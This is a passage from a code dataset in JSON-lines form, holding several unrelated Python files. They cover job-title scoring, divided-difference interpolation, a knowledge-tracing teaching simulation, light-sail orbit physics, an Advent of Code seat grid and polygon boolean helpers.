str_list = []\n i = 0\n word_str = \"\"\n while i < len(string):\n if not string[i].isspace():\n word_str += string[i]\n else:\n str_list.append(word_str)\n word_str = \"\"\n i += 1\n return str_list\n\n\nclass PointGeneration:\n \"\"\" Scores individual jobs based on specific terms \"\"\"\n\n \"\"\" Used by base_scoring()\n Lists of terms that determine the base score for each job aggregated;\n job title string is compared to these terms\n * HIGH: base score of 2.5\n * MID: base score of 0\n * LOW: base score of -2.5\n\n If job title does not have a word that matches any term in these lists,\n it's given a base score of -3 (non-technical job) \"\"\"\n\n _BASE_TERMS_LOW = [\"support\", \"technician\", \"sales\"]\n _BASE_TERMS_MID = [\"qa\", \"quality assurance\", \"analyst\", \"consultant\"]\n _BASE_TERMS_HIGH = [\"engineer\", \"engineering\", \"developer\", \"manager\"]\n\n \"\"\" Used by apply_modifiers()\n Each key is compared to each word of a job title, and if a term is found,\n the floating point value will be added to the base score \"\"\"\n _MOD_TERMS = {\n \"temp\": -1.0,\n \"intern\": -0.5,\n \"junior\": 0.5,\n \"associate\": 0.5,\n \"contractor\": 0.0,\n \"mid-level\": 1.0,\n \"senior\": 1.5,\n \"principal\": 2.0,\n \"director\": 2.0\n }\n\n \"\"\" Used by check_for_job_removal()\n Global list that holds all jobs given a base rating \"\"\"\n _RATED_JOBS = []\n\n def __init__(self, scraped_list):\n \"\"\" Takes list from /scraping/IndeedScraper.py to use in all PointGeneration functions \"\"\"\n self.job_aggregate_data = scraped_list\n self.total_score = 0\n\n # Only used by base_scoring(), appended into _RATED_JOBS global list\n # Used to hold job title (key) and base score (value)\n self.job = {}\n\n def base_scoring(self):\n \"\"\" Gives each job a starting score based on job title \"\"\"\n for job in self.job_aggregate_data:\n for category in job.keys():\n if category == \"title\":\n job_title = job.get(\"title\").lower() # ignoring capitalization\n if self.check_against_BASE_HIGH(job_title):\n self.total_score = 2.5\n elif self.check_against_BASE_LOW(job_title):\n self.total_score = -2.5\n elif self.check_against_BASE_MID(job_title):\n self.total_score = 0\n else: # NO RELATED TERMS (IN SCOPE OF PROJECT)\n self.total_score = -3\n self.job[job_title] = self.total_score\n self._RATED_JOBS.append(self.job)\n\n def check_against_BASE_HIGH(self, job_title):\n \"\"\" Used only by base_scoring(); helper function that\n compares each term in _BASE_TERMS_HIGH with each job title \"\"\"\n for term in self._BASE_TERMS_HIGH:\n if job_title.find(term) != -1:\n return True\n return False\n\n def check_against_BASE_MID(self, job_title):\n \"\"\" Used only by base_scoring(); helper function that\n compares each term in _BASE_TERMS_MID with each job title \"\"\"\n for term in self._BASE_TERMS_MID:\n if job_title.find(term) != -1:\n return True\n return False\n\n def check_against_BASE_LOW(self, job_title):\n \"\"\" Used only by base_scoring(); helper function that\n compares each term in _BASE_TERMS_LOW with each job title \"\"\"\n for term in self._BASE_TERMS_LOW:\n if job_title.find(term) != -1:\n return True\n return False\n\n def apply_modifiers(self):\n \"\"\" Applies modifier floats from _MOD_TERMS \"\"\"\n for job in self.job_aggregate_data:\n for category in job.keys():\n if category == \"title\":\n job_title = job.get(\"title\").lower()\n for term in self._MOD_TERMS:\n if (job_title.find(term) != -1) and (not self.check_for_removal(job_title)):\n self.total_score += self._MOD_TERMS[term]\n\n def check_for_removal(self, job_title):\n \"\"\" Helper function used by only apply_modifiers();\n checks to see if a job has a base score of -3 or lower\n and ignores applying modifiers if so \"\"\"\n for jobs in self._RATED_JOBS: # job is a dict\n for title in jobs.keys():\n if title == job_title:\n if jobs[title] <= -3:\n return True # should be removed\n return False # should not be removed\n\n def modify_score_for_search_term(self, search_term):\n \"\"\" Checks the job summary to see if any words match the provided search term \"\"\"\n count = 0\n for job in self.job_aggregate_data:\n for category in job.keys():\n if category == \"summary\":\n summary = parse_string(job.get(\"summary\").lower()) # ignore capitalization\n for word in summary:\n if word == search_term.lower():\n count += 1\n print(\"count: \" + str(count))\n search_term_modifier = 0.25 * count\n self.total_score += search_term_modifier\n\n\ndef main():\n pass\n # test_point_gen = PointGeneration('jsonTest_techFocus')\n # test_point_gen.base_scoring()\n # test_point_gen.apply_modifiers()\n # test_point_gen.modify_score_for_search_term(\"support\")\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"DataIsGone/job-aggregator","sub_path":"PointGeneration.py","file_name":"PointGeneration.py","file_ext":"py","file_size_in_byte":5843,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"71670211892","text":"from sympy import *\nimport numpy as np\n\nx = Symbol('x')\n# m = [[1, 2], [0, 4], [4, -16]]\nm = [[-3, 9], [5, 2], [7, -1], [8, 0]]\n# m = [[0,2], [1,3], [2,2], [3,1], [4,3]]\n\ninicio = m[0][1]\ndiagonal = [inicio]\ncolumna = []\ncolumnas = []\n\n\ndef clear():\n copy_col = columna.copy()\n columnas.append(copy_col)\n del columna[:]\n\n\ndef inicial():\n i = 0\n while i <= len(m):\n try:\n col = (m[i + 1][1] - m[i][1]) / (m[i + 1][0] - m[i][0])\n if i == 0:\n diagonal.append(int(col))\n columna.append(col)\n except Exception:\n pass\n i += 1\n clear()\n\n\ndef diferencias_divididas(j):\n i = 0\n while i <= len(columnas[j]):\n try:\n col = (columnas[j][i + 1] - columnas[j][i]) / (m[i + j + 2][0] - m[i][0])\n if i == 0:\n diagonal.append(col)\n columna.append(col)\n except Exception:\n pass\n i += 1\n clear()\n\n\ndef formula():\n x = Symbol('x')\n '''\n # 3 elementos\n print(expand(diagonal[0]+ \n diagonal[1]*(x-m[0][0]) +\n diagonal[2]*(x-m[0][0])*(x-m[1][0])\n )\n )\n '''\n\n # 4 elementos\n print(expand(diagonal[0] +\n diagonal[1] * (x - m[0][0]) +\n diagonal[2] * (x - m[0][0]) * (x - m[1][0]) +\n diagonal[3] * (x - m[0][0]) * (x - m[1][0]) * (x - m[2][0])\n )\n )\n\n '''\n # 5 elementos\n print(expand(diagonal[0]+ \n diagonal[1]*(x-m[0][0]) +\n diagonal[2]*(x-m[0][0])*(x-m[1][0]) +\n diagonal[3]*(x-m[0][0])*(x-m[1][0])*(x-m[2][0]) +\n diagonal[4]*(x-m[0][0])*(x-m[1][0])*(x-m[2][0])*(x-m[3][0])\n )\n )\n '''\n\n\ndef print_matrix():\n matrix = np.zeros((len(m), len(m) + 2))\n # Always\n for i in range(len(m)):\n matrix[i][0] = i\n for i in range(len(m)):\n matrix[i][1] = m[i][0]\n for i in range(len(m)):\n matrix[i][2] = m[i][1]\n # Column 3\n for i in range(len(columnas[0])):\n matrix[i + 1][3] = columnas[0][i]\n # Column 4\n for i in range(len(columnas[1])):\n matrix[i + 2][4] = columnas[1][i]\n # Column 5\n for i in range(len(columnas[2])):\n matrix[i + 3][5] = columnas[2][i]\n '''\n # Column 6\n for i in range(len(columnas[3])):\n matrix[i+4][6] = columnas[3][i]\n '''\n print(matrix)\n\n\nif __name__ == '__main__':\n inicial()\n j = 0\n while True:\n if len(columnas[j]) != 1:\n diferencias_divididas(j)\n j += 1\n else:\n break\n print(diagonal)\n print(columnas)\n formula()\n print_matrix()\n","repo_name":"czunigamunoz/ResolucionEcuacionesNoLineales","sub_path":"diferencias_divididas.py","file_name":"diferencias_divididas.py","file_ext":"py","file_size_in_byte":2640,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"25532587232","text":"\nfrom random import randint\nfrom random import random\n\nimport math\nimport copy\nimport random\n\nimport matplotlib.pyplot as plt; plt.rcdefaults()\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n###############################################################################################\n################## CONDITION COMPARISONS ######################################\n###############################################################################################\n\n\n#####################################################\n######### C-BKT UPDATE ##############\n#####################################################\n\ndef probability_attempted(t, time_attempted):\n\tif t > time_attempted:\n\t\treturn 1\n\telse:\n\t\treturn float(t) / time_attempted\n\t\t\ndef update_belief_right(sk, slip, guess):\n\tknows_notslipped = sk*(1-slip)\n\tnotknows_guessed = (1-sk)*guess\n\ttop = knows_notslipped\n\tbottom = knows_notslipped + notknows_guessed\n\treturn top / bottom\n\t\ndef update_belief_wrong(sk, slip, guess, t, attempted):\n\tknow_tried_slipped = sk*probability_attempted(t, attempted)*slip\n\tknows_nottried = sk*(1-probability_attempted(t, attempted))\n\tnotknows_nottried = (1-sk)*(1-probability_attempted(t, attempted))\n\tnotknows_tried_notguessed = (1-sk)*probability_attempted(t, attempted)*(1-guess) \n\ttop = know_tried_slipped + knows_nottried\n\tbottom = know_tried_slipped + knows_nottried + notknows_nottried + notknows_tried_notguessed \n\treturn top / bottom\n\t\ndef CBKT_get_new_belief(obs, p, task, ts):\n\tb_round = []\n\tfor skill in range (0, len(obs)):\n\t\tcurrent_skill_obs = obs[skill]\n\t\tinit_belief = p.initial_belief[skill]\n\t\tb = 0\n\t\tfor i in range (0, history_rounds):\n\t\t\tb_ts = 0\n\t\t\tif (i == 0):\n\n\t\t\t\tif (obs[skill] == 0):\n\t\t\t\t\tb_ts = update_belief_wrong(init_belief, task.skills[skill].p_slip, task.skills[skill].p_guess,ts, task.skills[skill].attempted)\n\t\t\t\t\thistory[ts].append(b_ts)\n\t\t\t\telse:\n\t\t\t\t\tb_ts = update_belief_right(init_belief, task.skills[skill].p_slip, task.skills[skill].p_guess)\n\t\t\t\t\thistory[ts].append(b_ts)\n\t\t\telif (ts - i) < 0:\n\t\t\t\tb_ts = p.initial_belief[skill]\n\t\t\telse:\n\t\t\t\tb_ts = history[ts - i][skill]\n\t\t\tb += b_ts\n\t\tb = b / history_rounds\n\t\tb_round.append(b)\n\treturn b_round\n\t\n\n######################################################\n######### BKT UPDATE FROM START #######\n######################################################\n\ndef update_belief_right_traditional(sk, slip, guess):\n\tknows_notslipped = sk*(1-slip)\n\tnotknows_guessed = (1-sk)*guess\n\ttop = knows_notslipped\n\tbottom = knows_notslipped + notknows_guessed\n\treturn top / bottom\n\t\ndef update_belief_wrong_traditional(sk, slip, guess):\n\tknow_tried_slipped = sk*slip\n\tnotknows_tried_notguessed = (1-sk)*(1-guess) \n\ttop = know_tried_slipped \n\tbottom = know_tried_slipped + notknows_tried_notguessed \n\treturn top / bottom\n\t\ndef BKT_get_new_belief_from_start(obs, p, task):\n\tb_round = []\n\tfor skill in range (0, len(obs)):\n\t\tcurrent_skill_obs = obs[skill]\n\t\tinit_belief = p.initial_belief[skill]\n\n\t\tb = 0\n\t\tif (obs[skill] == 0):\n\t\t\tb = update_belief_wrong_traditional(init_belief, task.skills[skill].p_slip, task.skills[skill].p_guess)\n\t\telse:\n\t\t\tb = update_belief_right_traditional(init_belief, task.skills[skill].p_slip, task.skills[skill].p_guess)\n\t\tb_round.append(b)\n\treturn b_round\n\t\n\t\n###############################################################################################\n################## BKT UPDATE EVERY TIMESTEP ##################################\n###############################################################################################\n\n\ndef BKT_get_new_belief_every_timestep(obs, p, task):\n\tb_round = []\n\tfor skill in range (0, len(obs)):\n\t\tcurrent_skill_obs = obs[skill]\n\t\tcurrent_belief = p.belief[-1][skill]\n\t\tb = 0\n\n\t\tif (obs[skill] == 0):\n\t\t\tb = update_belief_wrong_traditional(current_belief, task.skills[skill].p_slip, task.skills[skill].p_guess)\n\t\telse:\n\t\t\tb = update_belief_right_traditional(current_belief, task.skills[skill].p_slip, task.skills[skill].p_guess)\n\n\t\tb_round.append(b)\n\treturn b_round\n\n\n###############################################################################################\n################## AUXILIARY FUNCTIONS ########################################\n###############################################################################################\n\t\ndef decision(probability):\n\tv = random.uniform(0.0, 1.0)\n\tif (v < probability):\n\t\treturn 1\n\telse:\n\t\treturn 0\n\ndef write_file(name,info):\n\tf = open(name+\".txt\", \"w\")\n\tfor el in info:\n\t\tf.write(str(round(el,2)) + \"\\n\")\n\tf.close()\n\t\t\t\n###############################################################################################\n################## PERSON, SKILL, AND TASKS ###################################\n###############################################################################################\n\nclass Person():\n\tdef __init__(self, p_id, task):\n\t\tself.p_id = p_id\n\t\tself.mastery = []\n\t\tself.initial_belief = []\n\t\tself.belief = []\n\t\tself.start_b = random.uniform(0.5, 0.5)\n\t\tself.prev_obs = []\n\t\tself.task = task\n\t\tfor i in range(0, task.number_skills):\n\t\t\tm = random.randint(0,1)\n\t\t\t# ~ if (m == 0):\n\t\t\t\t# ~ self.start_b = random.uniform(0.1, 0.6)\n\t\t\t# ~ else:\n\t\t\t\t# ~ self.start_b = random.uniform(0.4, 0.9)\n\t\t\tself.mastery.append(m)\n\t\t\tself.initial_belief.append(self.start_b)\n\t\tself.belief.append([self.start_b]*task.number_skills) #set to just have the initial belief (complete uncertianty) at the start\n\t\t\t\n\tdef get_obs(self, task, ts):\n\t\tobs = []\n\t\tfor i in range (0, task.number_skills):\n\t\t\tp_att = probability_attempted(ts, task.skills[i].attempted)\n\t\t\thas_attempted = decision(p_att)\n\t\t\tcan_do = self.mastery[i]\n\n\t\t\tif (has_attempted == 0):\n\t\t\t\tobs.append(0)\n\t\t\telse:\n\t\t\t\tif (can_do == 1):\n\t\t\t\t\tprobability = 1 - task.skills[i].p_slip\n\t\t\t\t\tobs.append(decision(probability))\n\t\t\t\telse:\n\t\t\t\t\tprobability = task.skills[i].p_guess\n\t\t\t\t\tobs.append(decision(probability))\n\t\treturn obs\n\t\n\tdef teach_skill(self, round_belief):\n\t\tmin_belief = 100\n\t\tmin_i = -1\n\t\tfor i in range(0, len(round_belief)):\n\t\t\tif (round_belief[i] < min_belief):\n\t\t\t\tmin_belief = round_belief[i]\n\t\t\t\tmin_i = i\n\t\tif (self.mastery[min_i] == 0):\n\t\t\tp_learning = self.task.skills[min_i].teaching\n\t\t\thas_learned = decision(p_learning)\n\t\t\t# ~ print (\"has learned\" + str(has_learned))\n\t\t\tif (has_learned):\n\t\t\t\tself.mastery[min_i] = 1\n\t\t\t\t\n\tdef teach_skill2(self, round_belief):\n\t\tless_04 = []\n\t\tfor i in range(0, len(round_belief)):\n\t\t\tif (round_belief[i] < 0.3):\n\t\t\t\tless_04.append(i)\n\t\tif (less_04 != []):\n\t\t\tmin_i = random.choice(less_04)\n\t\t\tif (self.mastery[min_i] == 0):\n\t\t\t\tp_learning = self.task.skills[min_i].teaching\n\t\t\t\thas_learned = decision(p_learning)\n\t\t\t\t# ~ print (\"has learned\" + str(has_learned))\n\t\t\t\tif (has_learned):\n\t\t\t\t\tself.mastery[min_i] = 1\n\t\t\t\t\n\tdef skills_known(self):\n\t\tcount = 0\n\t\tfor s in self.mastery:\n\t\t\tif s == 1:\n\t\t\t\tcount +=1\n\t\treturn count\n\t\t\n\t\nclass Skill():\n\tdef __init__(self, name):\n\t\tself.name = name\n\t\tself.p_guess = random.uniform(0.1, 0.25)\n\t\tself.p_slip = random.uniform(0.1, 0.25)\n\t\tself.attempted = random.randint(40, 150)\n\t\tself.teaching = random.uniform(0.15, 0.35)\n\n\n\t\nclass Task():\n\tdef __init__(self):\n\t\tself.skills = []\n\t\tself.number_skills = random.randint(5,10)\n\t\tfor i in range (0, self.number_skills):\n\t\t\tskill = Skill(i)\n\t\t\tself.skills.append(skill)\n\t\t\n\t\n\t\n\t\n\t\n###############################################################################################\n################## MEASURES AND REWARD FUNCTIONS ##############################\n###############################################################################################\n\ndef distance(b1, b2):\n\td = []\n\tfor ts in range (0, len(b1)):\n\t\td_ts = 0\n\t\tfor sk in range (0, len(b1[0])):\n\t\t\td_ts += abs(b1[ts][sk] - b2[ts][sk])\n\t\td.append(d_ts / len(b1[0]))\n\treturn d\n\t\n\t\n###############################################################################################\n################## 100 ROUNDS OF SIMULATION ######################################\n###############################################################################################\n\n\t\nhistory_rounds = 10 #amount of rounds it will average over\nn_timesteps = 180\nrounds = 1000\n\nskills_learned_CBKT = []\nskills_learned_IBKT = []\nskills_learned_EBKT = []\nskills_learned_TBKT = []\nskills_learned_TS = []\n\nfor round_n in range (0, rounds): \n\ttask = Task()\n\tp = Person(round_n, task)\n\t# ~ print (p.mastery)\n\tcount_skills_known_before = p.skills_known()\n\tp_C_BKT = copy.deepcopy(p)\n\t# ~ p_T_BKT = copy.deepcopy(p)\n\tp_I_BKT = copy.deepcopy(p)\n\tp_E_BKT = copy.deepcopy(p)\n\tp_T_BKT = copy.deepcopy(p)\n\tTrue_State = copy.deepcopy(p)\n\tTrue_State.belief = [True_State.mastery]\n\thistory = [ [] for _ in range(n_timesteps) ]\n\tfor ts in range (0, n_timesteps):\n\t\tobs = p.get_obs(task, ts)\n\t\t#update for C-BKT\n\t\tb_C_BKT = CBKT_get_new_belief(obs, p_C_BKT, task, ts)\n\t\tp_C_BKT.belief.append(b_C_BKT )\n\t\t#update for I-BKT\n\t\tb_I_BKT = BKT_get_new_belief_from_start(obs, p_I_BKT, task)\n\t\tp_I_BKT.belief.append(b_I_BKT)\n\t\t#update for E-BKT\n\t\tb_E_BKT = BKT_get_new_belief_every_timestep(obs, p_E_BKT, task)\n\t\tp_E_BKT.belief.append(b_E_BKT)\n\t\t\n\t\tb_T_BKT = p_T_BKT.initial_belief\n\t\tp_T_BKT.belief.append(b_T_BKT)\n\t\t# ~ print (p_T_BKT.start_b)\n\t\t#the true state belief, will be whether they have mastery or not\n\t\tTrue_State.belief.append(p.mastery)\n\t\t\n\t\t# ~ print (ts % n_timesteps)\n\t\tif (ts % 20 == 19):\n\t\t\t# ~ print (\"TEACHING\")\n\t\t\tp_C_BKT.teach_skill(b_C_BKT)\n\t\t\tp_I_BKT.teach_skill(b_I_BKT)\n\t\t\tp_E_BKT.teach_skill(b_E_BKT)\n\t\t\tp_T_BKT.teach_skill(b_T_BKT)\n\t\t\tTrue_State.teach_skill(True_State.mastery)\n\t\n\t\t# ~ print (p_C_BKT.skills_known())\n\tskills_learned_CBKT.append(p_C_BKT.skills_known() - count_skills_known_before)\n\tskills_learned_IBKT.append(p_I_BKT.skills_known() - count_skills_known_before)\n\tskills_learned_EBKT.append(p_E_BKT.skills_known() - count_skills_known_before)\n\tskills_learned_TBKT.append(p_T_BKT.skills_known() - count_skills_known_before)\n\tskills_learned_TS.append(True_State.skills_known() - count_skills_known_before)\n\t\n\nav_CBKT = (sum(skills_learned_CBKT) / len(skills_learned_CBKT))\nav_IBKT = (sum(skills_learned_IBKT) / len(skills_learned_IBKT))\nav_EBKT = (sum(skills_learned_EBKT) / len(skills_learned_EBKT))\nav_TBKT = (sum(skills_learned_TBKT) / len(skills_learned_TBKT))\nav_Opt = (sum(skills_learned_TS) / len(skills_learned_TS))\n\nwrite_file(\"Learned_TBKT\", skills_learned_TBKT) \nwrite_file(\"Learned_CBKT\", skills_learned_CBKT) \nwrite_file(\"Learned_IBKT\", skills_learned_IBKT) \nwrite_file(\"Learned_EBKT\", skills_learned_EBKT) \nwrite_file(\"Learned_Opt\", skills_learned_TS) \n\nprint (av_TBKT)\nprint (av_CBKT)\nprint (av_IBKT)\nprint (av_EBKT)\nprint (av_Opt)\n\ndef barplot_annotate_brackets(num1, num2, data, center, height, yerr=None, dh=.05, barh=.05, fs=None, maxasterix=None):\n\t\"\"\" \n\tAnnotate barplot with p-values.\n\n\t:param num1: number of left bar to put bracket over\n\t:param num2: number of right bar to put bracket over\n\t:param data: string to write or number for generating asterixes\n\t:param center: centers of all bars (like plt.bar() input)\n\t:param height: heights of all bars (like plt.bar() input)\n\t:param yerr: yerrs of all bars (like plt.bar() input)\n\t:param dh: height offset over bar / bar + yerr in axes coordinates (0 to 1)\n\t:param barh: bar height in axes coordinates (0 to 1)\n\t:param fs: font size\n\t:param maxasterix: maximum number of asterixes to write (for very small p-values)\n\t\"\"\"\n\n\tif type(data) is str:\n\t\ttext = data\n\telse:\n\t\t# * is p < 0.05\n\t\t# ** is p < 0.005\n\t\t# *** is p < 0.0005\n\t\t# etc.\n\t\ttext = ''\n\t\tp = .05\n\n\t\twhile data < p:\n\t\t\ttext += '*'\n\t\t\tp /= 10.\n\n\t\t\tif maxasterix and len(text) == maxasterix:\n\t\t\t\tbreak\n\n\t\tif len(text) == 0:\n\t\t\ttext = 'n. s.'\n\n\tlx, ly = center[num1], height[num1]\n\trx, ry = center[num2], height[num2]\n\n\tif yerr:\n\t\tly += yerr[num1]\n\t\try += yerr[num2]\n\n\tax_y0, ax_y1 = plt.gca().get_ylim()\n\tdh *= (ax_y1 - ax_y0)\n\tbarh *= (ax_y1 - ax_y0)\n\n\ty = max(ly, ry) + dh\n\n\tbarx = [lx, lx, rx, rx]\n\tbary = [y, y+barh, y+barh, y]\n\tmid = ((lx+rx)/2, y+barh)\n\n\tplt.plot(barx, bary, c='black')\n\n\tkwargs = dict(ha='center', va='bottom')\n\tif fs is not None:\n\t\tkwargs['fontsize'] = fs\n\n\tplt.text(*mid, text, **kwargs)\n\n\nplt.rcParams['font.family'] = 'serif'\nplt.rcParams['font.serif'] = ['Times New Roman'] + plt.rcParams['font.serif']\nplt.rcParams.update({'font.size': 15})\n\nheights = [av_TBKT,av_IBKT,av_EBKT,av_CBKT,av_Opt]\nbars = np.arange(len(heights))\nobjects = ('T-BKT', 'I-BKT', 'E-BKT', 'C-BKT', 'Optimal')\ny_pos = np.arange(len(objects))\n\n# ~ plt.figure()\n# ~ figure(figsize=(6, 6), dpi=80)\nbarlist = plt.bar(y_pos, heights, align='center')\nbarlist[0].set_color('#ffc61e')\nbarlist[1].set_color('#009ade')\nbarlist[2].set_color('#00cd6c')\nbarlist[3].set_color('#ff1f5b')\nbarlist[4].set_color('#757575')\n\nplt.ylim(0, 2.5)\nplt.xticks(y_pos, objects)\nplt.ylabel('Number of Skills Learned')\n# ~ plt.title('Average Number of Skills Demontrated')\nbarplot_annotate_brackets(0, 1, 'p < 0.05', bars, heights)\nbarplot_annotate_brackets(0, 2, 'p < 0.05', bars, heights, dh=.16)\nbarplot_annotate_brackets(0, 3, 'p < 0.05', bars, heights, dh=.11)\nbarplot_annotate_brackets(0, 4, 'p < 0.05', bars, heights)\nplt.show()\n\n","repo_name":"ScazLab/C-BKT","sub_path":"teaching.py","file_name":"teaching.py","file_ext":"py","file_size_in_byte":13203,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"73352880374","text":"import numpy as np\nfrom constants import *\nfrom initial import *\n\ndef Etot(x, y, vx, vy):\n r = np.sqrt(x**2 + y**2)\n K = 0.5*(vx**2 + vy**2)\n return K - G*Msun/r\n\ndef predict_peri(x, y, vx, vy):\n E = Etot(x, y, vx, vy)\n vec_r = np.array([x, y]) \n vec_v = np.array([vx, vy]) \n a = -G*Msun/2/E\n vec_e = ((np.linalg.norm(vec_v)**2 - G*Msun/np.linalg.norm(vec_r))*vec_r - np.dot(vec_r, vec_v)*vec_v)/(G*Msun)\n e = np.linalg.norm(vec_e)\n p = a*(1-e*e)\n return p\n\ndef Decide_Pointing(t, x, y, vx, vy, delay=0):\n r = np.array([x, y])\n v = np.array([vx, vy])\n rhat = r/np.linalg.norm(r)\n vhat = v/np.linalg.norm(v)\n Acc = False\n #limit = predict_peri(x, y, vx, vy)\n limit = np.linalg.norm(r)\n if t > delay:\n if limit > perihelion and Acc == False:\n phat = (rhat - vhat)/np.sqrt(2)\n else:\n Acc = True\n phat = (rhat + vhat)/np.sqrt(2)\n #phat = np.array([-rhat[1], rhat[0]])\n else:\n phat = np.array([-rhat[1], rhat[0]])\n return phat\n#%%\ndef core(t, y, delay=0):\n r_vec = y[:2]\n r = np.linalg.norm(r_vec)\n v_vec = y[2:]\n phat = Decide_Pointing(t, y[0], y[1], y[2], y[3], delay)\n dxdt = v_vec[0]\n dydt = v_vec[1]\n a_rp = aE*rE**2/r**2*np.dot(r_vec, phat)/np.linalg.norm(r_vec)*phat\n a_g = -G*Msun/r**3*r_vec\n a = a_rp + a_g\n dvxdt = a[0]\n dvydt = a[1]\n return np.array([dxdt, dydt, dvxdt, dvydt])\n\ndef predicted_orbit(x, y, vx, vy):\n E = Etot(x, y, vx, vy)\n if E < 0:\n vec_r = np.array([x, y]) \n vec_v = np.array([vx, vy]) \n a = -G*Msun/2/E\n vec_e = ((np.linalg.norm(vec_v)**2 - G*Msun/np.linalg.norm(vec_r))*vec_r - np.dot(vec_r, vec_v)*vec_v)/(G*Msun)\n e = np.linalg.norm(vec_e)\n h = np.linalg.norm(np.cross(np.array([vec_r[0], vec_r[1], 0]), np.array([vec_v[0], vec_v[1], 0])))\n theta = np.linspace(0, 2*np.pi, 1000)\n r_predict = h**2/G/Msun/(1+np.linalg.norm(vec_e)*np.cos(theta))\n P = np.array([r_predict*np.cos(theta), -r_predict*np.sin(theta)])\n if e == 0:\n R = np.array([[vec_e[0], -vec_e[1]], [vec_e[1], vec_e[0]]])\n else:\n R = np.array([[vec_e[0], -vec_e[1]], [vec_e[1], vec_e[0]]])/e\n OUT = np.matmul(R, P)\n else: \n OUT = [[], []]\n return OUT\n","repo_name":"CFP106020008/Light-Sail-Simulation","sub_path":"physics.py","file_name":"physics.py","file_ext":"py","file_size_in_byte":2330,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"7813756461","text":"from copy import deepcopy\n\n\ndef adjacent_cells(grid, y, x):\n neighbours = [(-1, 0), (-1, -1), (0, -1), (1, -1), (1, 0), (1, 1), (0, 1), (-1, 1)]\n res = []\n for (a, b) in neighbours:\n real_y = y+b\n real_x = x+a\n if 0 <= real_y < len(grid) and 0 <= real_x < len(grid[real_y]):\n while grid[real_y][real_x] not in [\"#\", \"L\"]:\n if 0 <= real_y+b < len(grid) and 0 <= real_x+a < len(grid[real_y+b]):\n real_y += b\n real_x += a\n else:\n # we hit a wall\n break\n if grid[real_y][real_x] in [\"#\", \"L\"]:\n res.append(grid[real_y][real_x])\n return res\n\n\ndef calculate_new_grid(grid):\n new_grid = deepcopy(grid)\n for idx, row in enumerate(grid):\n for idx2, col in enumerate(row):\n adjacent = adjacent_cells(grid, idx, idx2)\n if grid[idx][idx2] == \"L\" and \"#\" not in adjacent:\n new_grid[idx][idx2] = \"#\"\n elif grid[idx][idx2] == \"#\" and adjacent.count(\"#\") >= 5:\n new_grid[idx][idx2] = \"L\"\n return new_grid\n\n\ndef main():\n grid = []\n with open('input.txt') as f:\n lines = f.read().splitlines()\n for line in lines:\n grid.append(list(line))\n new_grid = calculate_new_grid(grid)\n while new_grid != grid:\n grid = new_grid\n new_grid = calculate_new_grid(grid)\n res = 0\n for row in new_grid:\n res += row.count(\"#\")\n print(f\"Result is {res}\")\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"schovancova/adventOfCode2020","sub_path":"11/solution_part_2.py","file_name":"solution_part_2.py","file_ext":"py","file_size_in_byte":1579,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"42216311632","text":"# -*- coding: utf-8 -*-\r\n# noqa: D205, D400, F403\r\nr\"\"\"\r\n------------\r\nnpg_bool_hlp\r\n-----------\r\n\r\n** Boolean helpers for overlay operations on poly geometry.\r\n\r\n----\r\n\r\nScript :\r\n npg_bool_hlp.py\r\n\r\nAuthor :\r\n Dan_Patterson@carleton.ca\r\n\r\n ``_.\r\n\r\nModified :\r\n 2023-06-03\r\n\r\nPurpose\r\n-------\r\nFunctions for boolean operations on polygons:\r\n\r\n\r\n\"\"\"\r\n# pylint: disable=C0103,C0302,C0415\r\n# pylint: disable=E1101,E1121\r\n# pylint: disable=W0105,W0201,W0212,W0221,W0611,W0612,W0621\r\n# pylint: disable=R0902,R0904,R0912,R0913,R0914,R0915\r\n\r\nimport sys\r\nimport numpy as np\r\nimport npg\r\nfrom npg.npGeo import roll_arrays\r\nfrom npg.npg_plots import plot_polygons # noqa\r\n\r\nft = {\"bool\": lambda x: repr(x.astype(np.int32)),\r\n \"float_kind\": '{: 6.2f}'.format}\r\nnp.set_printoptions(\r\n edgeitems=10, linewidth=120, precision=3, suppress=True, threshold=200,\r\n formatter=ft\r\n)\r\n\r\nscript = sys.argv[0]\r\n\r\n__all__ = ['add_intersections', 'prep_overlay']\r\n__helpers__ = ['_add_pnts_', 'del_seq_pnts', '_roll_', '_w_', '_wn_clip_',\r\n '_node_type_']\r\n\r\n\r\n# ---- (1) private helpers\r\n#\r\ndef _add_pnts_(ply0, ply1, x_pnts, whr):\r\n \"\"\"Return input arrays with intersections added to their lines.\r\n\r\n Parameters\r\n ----------\r\n ply0, ply1 : array_like\r\n N-2 arrays of clockwise ordered points representing poly* features.\r\n x_pnts : array_like\r\n The intersection points.\r\n whr : array_like\r\n The id locations where the line points intersect the polygon segments.\r\n\r\n Requires\r\n --------\r\n `_wn_clip_` is used to generate the intersection points and segments of the\r\n poly* features that they intersect on (this is the `whr`ere parameter).\r\n\r\n \"\"\"\r\n def _srt_pnts_(p):\r\n \"\"\"Order intersection points on a line, from the start/first point.\r\n\r\n `_sort_on_line_` is the full version, `p` is the combined point list.\r\n \"\"\"\r\n if len(p) == 2: # -- only start and end point\r\n return p\r\n dxdy = np.abs(p[0] - p[1:]) # difference from first\r\n if dxdy.sum(axis=0)[0] == 0: # -- vertical line check\r\n order = np.argsort(dxdy[:, 1]) # sort ascending on y-values\r\n else:\r\n order = np.argsort(dxdy[:, 0])\r\n p[1:] = p[1:][order]\r\n return p\r\n # --\r\n p_ = np.concatenate((ply0[:-1], ply0[1:]), axis=1).reshape((-1, 2, 2))\r\n p_ = list(p_)\r\n c_ = np.concatenate((ply1[:-1], ply1[1:]), axis=1).reshape((-1, 2, 2))\r\n c_ = list(c_)\r\n for cnt, cp in enumerate(whr):\r\n cl, pl = cp # print(f\"cnt {cnt} cp {cp}\") add this below to see order\r\n x = x_pnts[cnt]\r\n chk0 = (x == c_[cl]).all(-1).any(-1) # correct but slow\r\n chk1 = (x == p_[pl]).all(-1).any(-1) # correct but slow\r\n if not chk0:\r\n c_[cl] = np.concatenate((c_[cl], x[None, :]), axis=0)\r\n if not chk1:\r\n 